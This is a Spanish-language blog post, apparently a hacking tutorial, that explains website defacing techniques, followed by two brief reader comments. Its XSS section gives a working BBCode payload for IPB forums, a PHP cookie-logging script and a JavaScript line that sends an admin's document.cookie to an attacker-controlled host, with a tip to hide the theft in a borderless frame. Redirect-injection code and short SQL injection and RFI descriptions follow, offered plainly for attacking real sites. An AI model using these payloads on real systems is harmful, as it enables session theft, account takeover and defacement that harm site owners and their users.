TECNICAS MAS USADAS EN EL DEFACING

Bueno ya que andava corto de tiempo , leyendo una revista el otro dia , se me ocurrio postear una  idea basica , o como se ase un simple defacing , asi que vamos aprovechar el bugs de algunas paginas , mientra que no cierren despues de lo que pase xDxD , pero cada dia se va modificando y actualizando y mejorando los sistemas y sinceramente , mas errores van apareciendo , asi que vamos ah explicar uno sencillo y simple

-XSS (Cross Site Scripting)
-HTML Injection Simple
-SQL Injection
-RFI (Remote File Inclusion)

———-
-XSS (Cross Site Scripting)
———-

Bien, esta tecnica se basa en el filtrado de codigo malicioso (html, javascript) por el servidor web
recuerden que javascript se ejecuta en el browser y no en el servidor, la mayoria de la gente piensa que esta tecnica
no sirve que solo sirve para sacar ventanitas de alerta, FALSO

Un ejemplo:

entramos a alguna web donde muestran las nuevas vulnerabilidades
y vemos que dice algo sobre un nuevo bug XSS en todos las versiones de los ipb en las etiquetas BBCODE
(bug muy comun en estas aplicaciones)

el bug se explota asi:

[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url(“javascript:CODIGO MALIGNO”) [/color]

y donde dice codigo maligno pondriamos el cogigo javascript a ejecutar, que podemos hacer con esto, muchas cosas
si lo unico que queres hacer es molestarlo podriamos redireccionarlo a una web porno o tu sitio web personal

pero si se quiere intentar hacer un deface, podriamos intentar robar la cookie del admin

para esto necesitamos algunas cosas:

-un webhosting
-tener buena ingenieria social
-que el foro sea vulnerable
-que el browser del admin sea vulnerable

comenzemos primero

creamos un archivo de texto con este codigo:

<?
$cookie = $_GET[‘cookie’];
$fff = fopen(“archivo.txt”,”a”);
fwrite($fff, “$cookie \n”);
fclose($fff);
?>

lo guardamos como cookies.php y lo subimos a un servidor gratuito

ahora hay que construir el codigo que se va a encargar de robar la cookie

window.location=’ www.XXXXX.com/cookies.php?cookie=’+document.cookie;

en el color rojo va la pagina que defacearan

y aplicamos esto en el bug de los ipb:

`style=background:url(“javascript:window.location=’http://www.xxxx.com/cookies.php?cookie=’+document.cookie;”)

esto es lo que ay que hacer que el admin visualize

con esto va a ser redireccionado al archivo encargado de robar la cookie

Claro que esto va a ser muy evidente y si el admin tiene algo de concocimentos cambiara su pass casi inmediatamente, para esto se puede aplicar un frame de borde 0 y posiblemte nunca sabria que paso xD

-HTML Injection Simple

————————

Esta es un tecnica muy newbie consite en injectar codigo html en la web esto se puede hacer mediate tagboards, libros de visitas, etc

para poder llevar acabo esta tecnica la aplicacion tiene que tener activado el html

para saberlo ueden intentar postear esto:

<h1>Hola</h1>

Si ven que la palabar hola aparece mas grande de lo normal es que tenemos html activado

y pueden poner un codigo de redireccion a cualquier web

<script>window.location=’http://www.xxxx.com’;</script>

xD

jajaja eso va para Gott el Programador de CodeMaster xD

-SQL Injection

————————–

Esta tecnica ya a sido hablada bastante les recomiendo leer este tutoriales que encuentren por hay , y aprendanlo

hay 2 formas casi poco las saben de como evitar una SQL Injection , ya vere si les armo una guia de seguridad sobre esto

-RFI (Remote File Inclusion)

Se llama así (Inclusión Remota de Archivos) a una técnica que se usa generalmente en páginas webs. Esto es, la inclusión de un archivo en el servidor por medio de una vulnerabilidad en la web, la cual es producto de un error del programador.

Ahora bien, ¿cómo hacemos para explotar esta vulnerabilidad?. Para saber si una página es vulnerable a este bug, tendremos que buscar las variables que se pasan por el método GET (prefiero no explicar qué es para que todo el que no lo sepa, busque y pueda adquirir más conocimientos). Por ejemplo, en el buscador google, cuando buscamos algo y damos click en Búsqueda, nos muestra los resultados y en la barra de direcciones vemos algo como esto:

www.google.com.ar/search?hl=es&ie=UTF-8&q=aqui+la+busqueda&meta=

Todas esas variables (hl, ie, q, meta) son las que se pasan por el método GET. De esta manera podemos identificar las variables que nos permiten hacer file inclution.

Pero alguien sabe de como evitar esto HuhHuh¿¿¿¿¿
esa es la pregunta de muchos pues si amigos Sonrisa hay una forma

Hay que desactivar el acceso a variables globales , cosa que eso no se los enseñare , eso ya es de cada uno

Bien hasta aki ya explique las tecnicas mas usadas en el defacing , asi que bueno , espero que le sea util

Saludos Gui&ntilde;ar

 

By Benzakeitor

 

Matías Moreno Cárdenas

Publicado por: Matías Moreno Cárdenas

Analista de Seguridad IT y hacking ético / Desarrollador de Software Multiplataforma. Actualmente analista de seguridad informática y hacking ético en Grupo SIA

  1. Avatar

    Fail. RFI obsoleto.

    Responder

    1. Avatar

      En serio, si te las quieres dar de listo vete a un foro de script kiddie’s.

      Responder

Deja un comentario